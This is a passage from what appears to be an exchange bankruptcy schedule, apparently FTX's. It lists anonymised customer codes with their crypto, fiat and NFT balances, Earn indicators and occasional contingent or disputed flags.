| 07391708 | | BTC[.00000474], DOGE[1.84104], SOL[.1114342], USD[8.80] | | |
| 07391710 | | BTC[.00000117], NFT (351950244894752167/Australia Ticket Stub #717)[1], USD[0.00] | Yes | |
| 07391712 | | DAI[0], DOGE[0], LTC[0], SGD[0.00], SUSHI[0], TRX[0], USD[0.00] | | |
| 07391714 | | BRZ[1], DOGE[1], SHIB[4], SOL[1.9958395], USD[0.00], USDT[0] | | |
| 07391716 | | BTC[.00000987], USD[0.00] | | |
| 07391717 | | USD[10.00] | | |
| 07391721 | | BAT[0], BCH[0], BTC[0], CUSDT[1], ETH[0], LINK[0], MKR[0], NFT (534425531999131408/Hopeful )[1], SHIB[12628.5166155], USD[0.00] | Yes | |
| 07391726 | | BRZ[1], DOGE[4.04895447], SUSHI[.00002759], TRX[10528.68713883], USD[0.00] | Yes | |
| 07391727 | | BRZ[5.18031179], USD[1.00], USDT[0] | | |
| 07391728 | | BCH[0], BRZ[0], SHIB[0], TRX[0], USD[16.81], USDT[0] | | |
| 07391732 | | USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07391737 | | USD[0.00] | | |
| 07391738 | | SOL[0.38090291], USD[0.00] | | |
| 07391739 | | BTC[.00021572], CUSDT[42], DOGE[568.25566093], LTC[2.31093935], TRX[1], UNI[7.60489483], USD[0.30] | Yes | |
| 07391741 | | ETH[.00051416], ETHW[.00051416], USD[0.00] | | |
| 07391743 | | USD[0.00], USDT[0] | | |
| 07391744 | | BTC[.45863776], SUSHI[2497.5], USD[0.21] | | |
| 07391747 | | DOGE[147.51655873], USD[0.00] | | |
| 07391751 | | TRX[1], USD[0.00] | | |
| 07391754 | | USD[10.00] | | |
| 07391757 | | BTC[.03985373], CUSDT[2], DOGE[241.961561], LINK[.00483031], TRX[1], USD[3.89] | | |
| 07391760 | | SOL[1.30491874], USD[0.00] | | |
| 07391761 | | BRZ[1], CUSDT[1], DOGE[3973.32334572], TRX[4767.36971547], USD[0.00] | | |
| 07391764 | | TRX[183.09148914], USD[0.00] | Yes | |
| 07391765 | | BRZ[1], CUSDT[1], USD[0.01], USDT[0] | Yes | |
| 07391774 | | BTC[.0410352], DOGE[1261.978], ETH[.981], ETHW[.981], SOL[50.2735], USD[7.19] | | |
| 07391777 | | CUSDT[2], DOGE[241.43191624], SUSHI[.00011133], TRX[0], USD[0.00], USDT[0] | | |
| 07391778 | | USD[317.06] | | |
| 07391779 | | DOGE[1], SUSHI[29.12760538], USD[0.00] | | |
| 07391784 | | USD[0.00] | | |
| 07391785 | | BAT[1.01643207], ETH[2.56429034], ETHW[2.56321334], USD[0.00] | Yes | |
| 07391789 | | BTC[.00017807], USD[0.00] | | |
| 07391791 | | USD[10.00] | | |
| 07391795 | | MATIC[9.99], SOL[0], USD[0.04], USDT[0] | | |
| 07391801 | | BRZ[1], CUSDT[1], DOGE[3.09115358], USD[0.00] | | |
| 07391802 | | BCH[.5558432], BRZ[1], CUSDT[3], DOGE[308.48896278], ETH[.02674571], ETHW[.02641739], LINK[1.06360913], SHIB[1], SOL[3.43945711], TRX[1], USD[0.00] | Yes | |
| 07391803 | | BRZ[5.13163526], USD[0.00] | | |
| 07391807 | | CUSDT[1], ETH[.02789056], ETHW[.02789056], USD[50.00] | | |
| 07391808 | | BAT[.00086631], BCH[.00000742], BRZ[5], BTC[0.00000093], CUSDT[8.00728136], DOGE[25424.44702564], ETH[.00000502], ETHW[.00000502], GRT[.02836991], LINK[0.00035751], LTC[.00033372], MATIC[.0000061], SHIB[422267885.00549945], SOL[.00011662], SUSHI[.00789333], TRX[3.04012594], USD[1.23], USDT[0.00008063] | Yes | |
| 07391809 | | BTC[0.00099850], DOGE[0], USD[0.08] | Yes | |
| 07391811 | | USD[0.00] | | |
| 07391812 | | CUSDT[3], DOGE[1], LINK[3.4469998], SOL[1.32156992], USD[0.00] | Yes | |
| 07391813 | | USD[10.00] | | |
| 07391814 | | BAT[0], BRZ[0], BTC[0], DOGE[0], LTC[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07391816 | | BAT[18.28108537], CUSDT[4], DOGE[0], TRX[1], USD[0.00] | Yes | |
| 07391817 | | BAT[35.84846959], CUSDT[6], DOGE[49.40963561], ETH[0.09390679], ETHW[0.09285969], TRX[1770.35147216], USD[0.00] | Yes | |
| 07391822 | | CUSDT[9], TRX[1], USD[10.01] | | |
| 07391826 | | BTC[.12231057], ETH[2.2275885], ETHW[2.12504797], MATIC[321.7872179], SOL[86.06236429], SUSHI[84.63003826], UNI[26.27928916] | Yes | |
| 07391827 | | DOGE[239.76], ETH[.00026099], ETHW[.00026099], USD[0.08] | | |
| 07391834 | | DOGE[103.82297171], USD[0.00] | | |
| 07391838 | | BF_POINT[600], DOGE[0], ETH[0], ETHW[0], NFT [439859778586945007/Saudi Arabia Ticket Stub #1138][1], SHIB[7], SOL[0], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07391842 | | DOGE[1271.53151787], TRX[1], USD[50.00] | | |
| 07391846 | | CUSDT[2], DOGE[4], LTC[.00000797], TRX[2], USD[0.00] | | |
| 07391851 | | USD[35.74] | | |
| 07391854 | | ETH[.00000001], SOL[0.00550233], USD[0.00], USDT[0] | | |
| 07391855 | | ETH[0] | | |
| 07391858 | | CUSDT[1170.59556788], DOGE[1814.92842645], USD[0.00] | | |
| 07391859 | | CUSDT[5], SHIB[3], TRX[1], USD[0.00] | | |
| 07391862 | | AUD[6.00], BTC[.0037995], DOGE[61.938], ETH[.030996], ETHW[.030996], LINK[.1], MATIC[36.99], SHIB[499800], TRX[71.766], USD[6.24] | | |
| 07391863 | | USD[10.75] | Yes | |
| 07391864 | | CUSDT[1], DOGE[9.87803345], USD[0.61] | | |
| 07391866 | | USD[10.00] | | |
| 07391869 | | DOGE[989.54281761], SHIB[43126.45441103], USD[0.00] | | |
| 07391875 | | USD[10.00] | | |
| 07391881 | | BRZ[1], BTC[0.05015791], CUSDT[1], DOGE[4959.56972385], ETH[.99124607], ETHW[.99124607], TRX[2], USD[0.00], USDT[1] | | |
| 07391883 | | DOGE[139.06092918], SUSHI[.00912419], USD[0.00] | | |
| 07391886 | | CUSDT[3], USD[0.15], USDT[0] | | |
| 07391890 | | CUSDT[2], DOGE[487.03522471], SHIB[1], USD[0.01] | Yes | |
| 07391892 | | AAVE[.03117232], BRZ[70.78392755], BTC[.00150074], CUSDT[235.48204304], DOGE[1225.53387676], GRT[1207.82556703], KSHIB[478.84073288], LINK[29.39351282], SHIB[6], SOL[3.2501846], SUSHI[14.19712898], TRX[24282.2594739], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07391893 | | BTC[0.01180000], USD[1.05] | | |
| 07391897 | | BTC[.0000384], DOGE[.16], ETH[.00092], ETHW[.00092], GRT[.641], LINK[.0904], LTC[.00233], USD[0.59] | | |
| 07391900 | | BRZ[2], CUSDT[8], DOGE[5], ETH[0], LTC[0], SOL[0], TRX[2], USD[0.00], USDT[1] | | |
| 07391902 | | BRZ[1], CUSDT[3], DOGE[1295.52382102], TRX[1], USD[0.00] | | |
| 07391910 | | DOGE[1], USD[0.01] | | |
| 07391911 | | CUSDT[1], DOGE[1], NFT [304166640852920842/FFN Membership Booklet #169][1], NFT [424701640873411643/FFN Membership Booklet #409][1], NFT [509353065684783089/FFN Membership Booklet #827][1], NFT [514555000627766941/FFN Membership Booklet #1486][1], NFT [538771136706580571/FFN Membership Booklet #1012][1], SHIB[2], SOL[.05064114], TRX[1], USD[0.00] | Yes | |
| 07391913 | | SOL[0], USD[0.64], USDT[.00238275] | | |
| 07391914 | | USD[0.09] | | |
| 07391916 | | TRX[2], USD[0.00], USDT[0] | | |
| 07391925 | | USD[0.01] | | |
| 07391926 | | CUSDT[1], USD[5.52] | Yes | |
| 07391927 | | BTC[.000018], ETH[.000132], ETHW[.000132], SOL[70.297589], SUSHI[.02331873], USD[0.28], USDT[21.13950975] | | |
| 07391932 | | DOGE[16.58964101], USD[0.00], USDT[0] | Yes | |
| 07391933 | | DOGE[2], MATIC[0], SOL[19.31331305], TRX[4], USD[0.00] | Yes | |
| 07391934 | | BRZ[2], CUSDT[7], DOGE[796.04766621], GRT[2148.76545807], USD[0.00] | Yes | |
| 07391935 | | BTC[0.04630180], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], MATIC[0], NEAR[0], SHIB[3], SOL[0], SUSHI[0], TRX[0], USD[0.53], USDT[0.00001456] | Yes | |
| 07391938 | | BRZ[1], CUSDT[1], DOGE[2], ETH[.17267927], ETHW[.17267927], USD[0.00] | | |
| 07391939 | | USD[10.00] | | |
| 07391941 | | USD[27.29], USDT[0] | | |
| 07391944 | | USD[0.00] | | |
| 07391948 | | USD[10.00] | | |
| 07391950 | | CUSDT[1], DOGE[.10389644], GRT[1], TRX[1], UNI[2], USD[0.53] | | |
| 07391951 | | CUSDT[1], DOGE[1], SHIB[79651.10842101], USD[0.51] | Yes | |
| 07391953 | | USD[0.00] | | |
| 07391955 | | TRX[2.04694923], USD[0.00] | | |
| 07391957 | | BTC[.00000753], USD[0.45], USDT[0] | | |
| 07391963 | | CUSDT[1], TRX[642.24961751], USD[0.00] | | |
| 07391967 | | BTC[0], ETH[.000716], ETHW[.000716], TRX[1047.18], USD[1.07], USDT[0] | | |
| 07391968 | | USD[0.00] | Yes | |
| 07391971 | | USD[0.00] | | |
| 07391972 | | ETH[0], SHIB[2], USD[0.00] | Yes | |
| 07391974 | | BTC[.00044766], DOGE[.0076], USD[3728.63] | | |
| 07391987 | | BAT[6.60135033], DOGE[1], GRT[4.10577134], TRX[51.67751352], USD[2.58] | | |
| 07391988 | | ETHW[.00053], SOL[.004], USD[532.97] | | |
| 07391990 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07391996 | | SOL[110.43263346], TRX[1465.4102], USD[0.99] | | |
| 07391999 | | USD[10.00] | | |
| 07392001 | | BTC[0], SUSHI[0], USD[3.81] | | |
| 07392002 | | USD[10.00] | | |
| 07392006 | | USD[10.00] | | |
| 07392010 | | BTC[0.00009698], USD[0.00] | | |
| 07392011 | | DOGE[1], GRT[0], SHIB[190159.51528183], TRX[0], USD[0.00] | Yes | |
| 07392015 | | BAT[1], BRZ[2], BTC[0], CUSDT[16], TRX[7], USD[0.00], USDT[0] | | |
| 07392022 | | BCH[0], BTC[0.00010000], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07392023 | | GRT[0.75370784], SUSHI[26.54052301], TRX[.0425], USD[187.51] | | |
| 07392028 | | USD[0.00] | Yes | |
| 07392033 | | CUSDT[1], USD[0.01], USDT[0] | | |
| 07392036 | | USD[0.00] | | |
| 07392044 | | BRZ[1], CUSDT[2], ETH[.0002008], ETHW[.0002008], USD[0.00] | | |
| 07392046 | | DOGE[286], ETHW[1214.993629], MATIC[5332], SOL[1.56], USD[36012.37], USDT[0] | | |
| 07392056 | | DOGE[568.21328538], USD[0.00] | | |
| 07392057 | | DOGE[.40662323], TRX[1], USD[4.34] | | |
| 07392058 | | AAVE[2.151544], DOGE[2348.38490108], MATIC[309.55660573], SOL[75.02311430], UNI[49.04324726], USD[814.04] | | |
| 07392060 | | USD[0.01] | | |
| 07392061 | | BTC[.06218434], DOGE[524.50125], ETH[1.11856635], ETHW[1.11856635], LINK[19.981], SHIB[10490025], SOL[.99005], SUSHI[38.96295], USD[1.64] | | |
| 07392063 | | BRZ[2], CUSDT[2], DOGE[0], GRT[1], USD[0.00] | | |
| 07392070 | | BRZ[1.82293], BTC[.00009343], CUSDT[.00000007], DOGE[2127.90925604], ETH[.03761952], ETHW[.0371544], USD[266.86], YFI[.0014022] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07392071 | | DOGE[3], USD[0.00] | | |
| 07392072 | | BAT[1.0165555], BRZ[3.01053456], CUSDT[6], GRT[1.00501345], TRX[0], USD[0.00], USDT[1.10815182] | Yes | |
| 07392076 | | USD[10.91] | Yes | |
| 07392080 | | SUSHI[0], USD[0.00] | | |
| 07392081 | | BAT[73.05906138], BCH[.16855625], BRZ[6.28059199], BTC[.04808804], CUSDT[106.94434002], DOGE[409.63952921], ETH[.66383172], ETHW[.66355296], SHIB[1885651.18378854], SOL[2.83625727], TRX[185.90756949], USD[0.01], USDT[1.02543197] | Yes | |
| 07392082 | | BRZ[0], CUSDT[1], DOGE[0], GRT[0], LINK[0], LTC[0], TRX[0], USD[0.01] | | |
| 07392083 | | DOGE[1449.21126048], UNI[3.12381132], USD[26.82] | | |
| 07392084 | | USD[0.00] | | |
| 07392087 | | AAVE[.13393773], CUSDT[70.24570294], DOGE[150.29568946], ETH[0], GRT[51.3495339], KSHIB[736.61891529], LINK[1.48079971], MATIC[33.14879249], MKR[.01120799], SOL[.25698454], SUSHI[.00000677], TRX[5], UNI[1.69944171], USD[0.00], YFI[.00127486] | Yes | |
| 07392088 | | DOGE[2.00001604], TRX[1], USD[0.01] | | |
| 07392090 | | USD[0.00] | | |
| 07392091 | | BTC[0], SOL[.00362], USD[0.37], USDT[0.71345941] | | |
| 07392095 | | DOGE[166.69631648], USD[0.00] | | |
| 07392097 | | USD[0.00] | | |
| 07392098 | | USD[390.00] | | |
| 07392106 | | BTC[.0000205], ETH[.00055103], ETHW[.00055103], USD[0.00] | | |
| 07392108 | | PAXG[.00312884], TRX[1], USD[0.00] | | |
| 07392110 | | NFT (494743433498968324/Entrance Voucher #3424)[1] | | |
| 07392111 | | BTC[0], SOL[0] | | |
| 07392112 | | BTC[.10903856], CUSDT[2], DOGE[6.17133123], TRX[3], USD[0.00] | Yes | |
| 07392116 | | DOGE[0], USD[0.01] | | |
| 07392119 | | BRZ[1], BTC[.00008032], CUSDT[9], DOGE[1], SHIB[1], TRX[4], USD[-0.89] | Yes | |
| 07392120 | | USD[0.01], USDT[0] | Yes | |
| 07392123 | | BCH[.3656523], BTC[0.00645129], ETH[.9204888], ETHW[.9204888], SUSHI[11.4563], TRX[3665.51445], USD[1.16] | | |
| 07392130 | | DOGE[0], ETH[0.00000001], ETHW[0], LINK[0], MATIC[0], SOL[0], USD[4.02], USDT[0.00000113] | | |
| 07392132 | | SOL[.076], USD[2.06] | | |
| 07392139 | | BTC[0], ETH[.00001077], ETHW[.00001077], USD[0.12], YFI[.00020847] | | |
| 07392140 | | LTC[0], USD[0.00] | | |
| 07392141 | | BTC[.0000921], DOGE[.976], ETH[.01397], ETHW[.01397], MATIC[9.99], SHIB[1598600], SOL[.03], TRX[2780.209946], USD[34.79] | | |
| 07392142 | | BRZ[1], CUSDT[18], DOGE[2], TRX[1], USD[0.00], USDT[0.00004498] | Yes | |
| 07392143 | | BCH[0], BTC[0], DOGE[0], LTC[0], NFT (515252469139861568/Entrance Voucher #4543)[1], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07392145 | Contingent, Disputed | USD[0.00] | | |
| 07392150 | | BAT[70.87101048], DOGE[2], USD[0.00] | | |
| 07392154 | | BRZ[0], BTC[.0094801], LTC[.7840961], SHIB[13547.37968675], USD[0.00], USDT[0], YFI[.00097829] | Yes | |
| 07392158 | | BTC[0.00001094], DOGE[.3027], LINK[.063805], USD[0.79] | | |
| 07392161 | | BRZ[3], CUSDT[1], DOGE[3], ETHW[1.57429722], TRX[1], USD[0.01] | Yes | |
| 07392170 | | BCH[0], BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], MATIC[0], MKR[0], SOL[0], SUSHI[0], TRX[0], USD[0.03], USDT[0.00000027] | | |
| 07392172 | | USD[0.00], USDT[0] | Yes | |
| 07392173 | | BF_POINT[100], BRZ[0], BTC[0], DOGE[0], ETH[0.00000001], GRT[0], LINK[0], MATIC[0], NFT (372461299677311807/Aku World Avatar #45)[1], NFT (478362376629361118/NFT BZL 2021 #49)[1], SHIB[6], SOL[0], SUSHI[0], TRX[0.00041075], USD[0.01], USDT[0.00000001], YFI[0] | Yes | |
| 07392178 | | BTC[0.00000126], DOGE[.1524], ETHW[.5433127], USD[0.00] | | |
| 07392179 | | DOGE[2804.68876867], TRX[1795.5452164], USD[0.00], USDT[99.43079746] | | |
| 07392183 | | BTC[0], ETH[.00000002], SOL[0], USD[0.00] | | |
| 07392185 | | ETH[0] | | |
| 07392186 | | BAT[0], BTC[0.00005568], DOGE[0], LTC[0], UNI[0], USD[0.00] | | |
| 07392191 | | DOGE[1], SOL[.00019706], USD[0.00] | Yes | |
| 07392195 | | USD[10.00] | | |
| 07392196 | | DOGE[25.76935969], USD[0.00] | | |
| 07392197 | | CUSDT[1], USD[0.00] | | |
| 07392200 | | ETH[.0005], ETHW[.0005], USD[0.00], USDT[0] | | |
| 07392202 | | SOL[7.576], USD[0.88] | | |
| 07392203 | | DOGE[1], USD[0.00] | | |
| 07392204 | | DOGE[1], USD[0.00] | | |
| 07392205 | | USD[5.57], USDT[0.00000006] | | |
| 07392208 | | USD[0.00] | | |
| 07392210 | | BAT[1], LINK[33.37528588], USD[0.00] | | |
| 07392211 | | CUSDT[5], DOGE[12862.16314681], ETH[0.11837326], ETHW[0.11722867], SOL[11.08538227], SUSHI[3.32978327], TRX[3273.29876398], USD[0.00], USDT[0] | Yes | |
| 07392216 | | SOL[0], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07392217 | | USD[0.00] | | |
| 07392221 | | DOGE[1], TRX[366.60300651], USD[0.00] | Yes | |
| 07392229 | | BRZ[0.00000141], ETH[0], TRX[0], UNI[0], USD[0.00] | | |
| 07392230 | | USD[10.00] | | |
| 07392237 | | USD[0.00] | | |
| 07392241 | | CUSDT[1], USD[0.01], USDT[1] | | |
| 07392244 | | BAT[.9962], BTC[0], DOGE[92], ETHW[1.9965312], EUR[1.00], USD[2.44] | | |
| 07392245 | | ETHW[0.25847348], USD[510.87], USDT[0] | Yes | |
| 07392246 | | ETH[.13725253], ETHW[.13725253] | | |
| 07392247 | | BTC[0.00006523], ETH[.00000001], ETHW[0.99582148], USD[0.00] | | |
| 07392248 | | USD[10.00] | | |
| 07392249 | | CUSDT[1], DOGE[0], ETH[0], ETHW[0], TRX[1], USD[0.00] | Yes | |
| 07392250 | | AAVE[.00836], BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], SOL[0.00000027], SUSHI[0], USD[1.55], USDT[0.00000110], YFI[0] | | |
| 07392252 | | NFT (317575477253849643/Imola Ticket Stub #1149)[1], TRX[185.81600567], USD[0.00] | Yes | |
| 07392253 | | BTC[.00063533], DOGE[.35048479], SHIB[2], SOL[.00043992], USD[0.00] | Yes | |
| 07392254 | | USD[10.00] | | |
| 07392256 | | SOL[12.1512], TRX[.000001], USDT[18.382] | | |
| 07392258 | | BAT[2.0002516], BF_POINT[200], CUSDT[5], DOGE[1], ETH[3.73715544], ETHW[3.73715544], LINK[1.0001258], MATIC[9237.14354289], SOL[17.39471005], TRX[4], USD[0.00], USDT[1] | | |
| 07392266 | | BRZ[1], BTC[.00002826], CUSDT[15], DOGE[1019.32974605], ETH[.01166787], ETHW[.01166787], SOL[1.24680741], TRX[3], USD[0.04] | | |
| 07392272 | | USD[10.00] | | |
| 07392274 | | SOL[123.04414316], UNI[.043431], USD[3.24], USDT[0] | | |
| 07392278 | | ETH[.00000001], NFT (543403850106415465/FTX - Off The Grid Miami #918)[1], USD[0.00] | | |
| 07392281 | | DOGE[1.2895467], USD[11.43] | | |
| 07392289 | | TRX[1], USD[0.01] | | |
| 07392291 | | CUSDT[4], DOGE[2623.79117737], SHIB[76196.13420275], SOL[.04524409], TRX[2], USD[-37.98] | Yes | |
| 07392295 | | CUSDT[3], DOGE[0], USD[0.00] | | |
| 07392296 | | USD[555.06] | Yes | |
| 07392297 | | USD[0.00] | Yes | |
| 07392299 | | BAT[0], CUSDT[1], DOGE[1], TRX[0.08044264], USD[0.00] | Yes | |
| 07392305 | | BRZ[1], CUSDT[5], DOGE[0], TRX[5], USD[0.01] | Yes | |
| 07392308 | | DAI[.78648226], DOGE[34.0834173], SUSHI[2.18546081], USD[0.06] | Yes | |
| 07392311 | | BRZ[2], BTC[.01622438], CUSDT[24], DOGE[5], ETH[1.3105074], ETHW[1.30995696], SHIB[8], TRX[5], USD[1905.63] | Yes | |
| 07392316 | | TRX[1], USD[0.00] | | |
| 07392317 | | USD[0.01] | | |
| 07392320 | | SUSHI[.51097622], USD[0.00] | | |
| 07392321 | | USD[0.00] | | |
| 07392323 | | SUSHI[.69842865], USD[0.00] | | |
| 07392324 | | DOGE[14.98686176], USD[0.00] | | |
| 07392327 | | CUSDT[3], DOGE[.00001241], SHIB[1], TRX[2], USD[0.17] | Yes | |
| 07392328 | | BAT[6.68701827], DOGE[881.98065249], GRT[2.68911041], TRX[92.21538045], USD[0.00] | | |
| 07392334 | Contingent, Disputed | BCH[0], BTC[0], DOGE[2], SOL[0], USD[0.00], USDT[0] | | |
| 07392335 | | USD[0.00] | | |
| 07392338 | | ETH[1.1237136], ETHW[1.1237136], USD[0.17] | | |
| 07392344 | | CUSDT[1], USD[0.00] | | |
| 07392345 | | SOL[0], TRX[.497424], USD[700.09] | | |
| 07392351 | | BTC[.00015581], DOGE[16.28852348], ETH[.00912301], ETHW[.00912301], GRT[2.25194675], USD[5.00] | | |
| 07392352 | | ETHW[.00751028], USD[0.00] | | |
| 07392353 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07392356 | | USD[10.00] | | |
| 07392359 | | BAT[3.94029992], BCH[.00665565], BRZ[5.07952967], BTC[.00003814], CUSDT[52.15946275], DOGE[3.66885508], ETH[.00138492], ETHW[.00137123], GRT[2.37980594], LINK[.14936893], LTC[.01565405], PAXG[.00000113], SOL[.0168278], SUSHI[.15626837], TRX[3.49131709], UNI[.11846513], USD[0.43], USDT[0], YFI[.00012233] | Yes | |
| 07392360 | | GRT[.25281], LTC[.00583995], SUSHI[.1764625], TRX[.798076], USD[1.26] | | |
| 07392361 | | BAT[1], CUSDT[24], SHIB[2], USD[0.00], USDT[0] | | |
| 07392362 | | USD[10.00] | | |
| 07392370 | | CUSDT[2], DOGE[1], TRX[2], USD[0.00] | | |
| 07392371 | | BTC[0.00002254], SUSHI[.314] | | |
| 07392375 | | USD[0.00] | | |
| 07392377 | | BRZ[1], CUSDT[30], DOGE[6.66705069], GRT[1], USD[0.63], USDT[0] | | |
| 07392382 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07392386 | | CUSDT[4], TRX[1.0000487], USD[0.01], USDT[0] | | |
| 07392388 | | CUSDT[2], DOGE[1877.94906821], TRX[1], USD[0.01] | Yes | |
| 07392391 | | ETHW[53.36], USD[0.01] | | |
| 07392394 | | BTC[0], NFT (326757202308047051/Entrance Voucher #1729)[1], NFT (419695627452154985/Humpty Dumpty #415)[1], USD[0.43] | | |
| 07392397 | | BTC[0], USD[0.00], USDT[0] | | |
| 07392400 | | BRZ[1], BTC[.00000887], CUSDT[1], DOGE[3], GRT[1], SHIB[.00000004], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07392401 | | BAT[1], BRZ[2], CUSDT[7], GRT[78.76583147], SHIB[2], TRX[7], USD[0.03], USDT[0.00000001] | | |
| 07392410 | | BTC[.01728916], DOGE[1.51896147], LTC[2.05892023], SOL[1.05487728], TRX[1], USD[0.00] | Yes | |
| 07392411 | | DOGE[14271.88530685], USD[0.00] | | |
| 07392420 | | CUSDT[16], DAI[0], DOGE[27.84863645], SUSHI[2.26448009], USD[0.01], USDT[0.17501476] | | |
| 07392424 | | USD[0.01] | | |
| 07392425 | | DOGE[212.148], GRT[.668], LTC[.00112345], TRX[.656543], USD[0.17] | | |
| 07392426 | | SOL[.00079295], USD[0.00] | | |
| 07392437 | | NFT (518009366108061085/FTX - Off The Grid Miami #2608)[1] | | |
| 07392438 | | DOGE[4.69651744], KSHIB[139.39533926], SHIB[139703.82788488], USD[0.00] | | |
| 07392440 | | NFT (514165171444122343/FTX - Off The Grid Miami #4880)[1] | | |
| 07392442 | | BCH[.02106976], BTC[.00087593], CUSDT[524.87826516], DAI[5.46956591], DOGE[401.41724032], ETH[.00265931], ETHW[.00263193], LTC[.04582383], MKR[.00385345], SOL[3.58215158], TRX[62.40295602], USD[0.06], USDT[5.48206333] | Yes | |
| 07392446 | | BRZ[2], CUSDT[1], DOGE[477.92112595], USD[0.00] | | |
| 07392447 | | USD[99.02], USDT[0] | | |
| 07392449 | | SHIB[1], USD[5089.40] | | |
| 07392451 | | AAVE[0], BAT[1], BRZ[1], BTC[0], DAI[0], DOGE[0], LINK[.00003843], MATIC[0], SHIB[13.29509292], SOL[.00000278], USD[0.00], USDT[0], YFI[.00000001] | Yes | |
| 07392454 | | BRZ[4], BTC[0], CUSDT[7], DOGE[1], LINK[0], LTC[0], SOL[0], TRX[11], USD[0.00] | | |
| 07392462 | | DOGE[30.65428662], USD[0.00] | | |
| 07392464 | | AVAX[.61134175], BAT[2.0276042], BRZ[2], BTC[.00051178], CUSDT[3], DOGE[1176.00121913], ETH[.01727702], ETHW[.01705814], GRT[5.93583992], LINK[1.26755644], MATIC[.99183101], SHIB[7], SOL[.3782185], SUSHI[110.6048755], TRX[10], USD[0.01], USDT[3.24366277] | Yes | |
| 07392466 | | USD[0.00], USDT[1] | | |
| 07392468 | | KSHIB[0], NFT (428535362358310393/Sigma Shark #2036)[1], SOL[0.01631190], USD[0.00], USDT[0] | | |
| 07392473 | | BRZ[1], CUSDT[4], GRT[1.00283507], SHIB[634894.82776559], TRX[2], USD[1.84], USDT[0] | Yes | |
| 07392478 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07392479 | | SOL[0], USD[4.32] | | |
| 07392485 | | CUSDT[1], DOGE[1], UNI[4.34332795], USD[526.46] | Yes | |
| 07392489 | | BAT[.00004122], DOGE[2], GRT[.00978775], USD[0.00] | | |
| 07392490 | | BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07392493 | | DOGE[0], LTC[0] | | |
| 07392495 | | BCH[0], BRZ[0], DOGE[0], ETH[0], LTC[0], USD[0.00] | Yes | |
| 07392508 | | DOGE[116.55761042], GRT[2.15016193], SUSHI[.30376115], USD[0.00] | | |
| 07392513 | | BAT[0], CUSDT[3], DOGE[3], GRT[1.00445538], LINK[106.81155186], TRX[2], UNI[11.04670969], USD[0.00], USDT[1.10381106] | Yes | |
| 07392514 | | BRZ[2], CUSDT[8], DOGE[17.58640505], ETH[0], SHIB[1], TRX[4], USD[0.01] | | |
| 07392515 | | BAT[1.01336694], BRZ[3], CUSDT[7], DOGE[1], NFT (534877897612896893/Pudge)[1], SHIB[2310222.33906442], TRX[3], USD[0.00], USDT[1.08140856] | Yes | |
| 07392521 | | DAI[0], ETH[0], SOL[0.00003608], USD[0.00], USDT[0.00000003] | Yes | |
| 07392523 | | USD[0.00], USDT[0] | | |
| 07392524 | | ETH[0], LTC[0], SUSHI[0.51073198], TRX[1], USD[0.00] | | |
| 07392527 | | DOGE[2.45779333], USD[0.00] | | |
| 07392531 | | USD[0.00] | | |
| 07392537 | | AAVE[0], BAT[1.00000916], BRZ[3], BTC[0], CUSDT[6], DAI[0], DOGE[6], ETH[0], GRT[1], LINK[0], SHIB[10], SOL[0], SUSHI[0.00091247], TRX[4], USD[0.00], USDT[1.07293892], YFI[0] | Yes | |
| 07392539 | | USD[10.00] | | |
| 07392541 | | BRZ[1], CUSDT[2], DOGE[.0292475], GRT[1.00498957], LTC[5.67351755], SHIB[1], TRX[3074.53976347], USD[0.00] | | |
| 07392545 | | ALGO[208.55265489], BAT[0], ETH[0], ETHW[0], MATIC[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], USD[1087.78], USDT[0] | Yes | |
| 07392546 | | CUSDT[1], DOGE[1], GRT[.85008758], USD[0.00] | | |
| 07392547 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07392549 | | DOGE[1], GRT[4.19383008], USD[0.00] | | |
| 07392552 | | SOL[31.872], SUSHI[5.4945], UNI[4.5816], USD[6.79] | | |
| 07392555 | | USD[0.00], USDT[0] | | |
| 07392555 | | BRZ[1], CUSDT[6], DOGE[0], ETH[.00201007], ETHW[.00198271], LINK[.01415364], SUSHI[.19318925], TRX[1], USD[0.00] | Yes | |
| 07392559 | | BAT[1.01633347], BRZ[1], CUSDT[1], DOGE[16366.48460035], GRT[4861.94406801], LINK[216.02730759], SOL[19.62065283], TRX[6158.41682264], USD[0.00] | Yes | |
| 07392569 | | DOGE[1], USD[9.88] | | |
| 07392573 | | DOGE[199.18834732], USD[0.00], USDT[1.99000799] | | |
| 07392579 | | BAT[1.00613747], BF_POINT[100], CUSDT[3], ETH[0], ETHW[0], MATIC[0], SHIB[1], TRX[3], USD[807.69], USDT[1.08537049] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
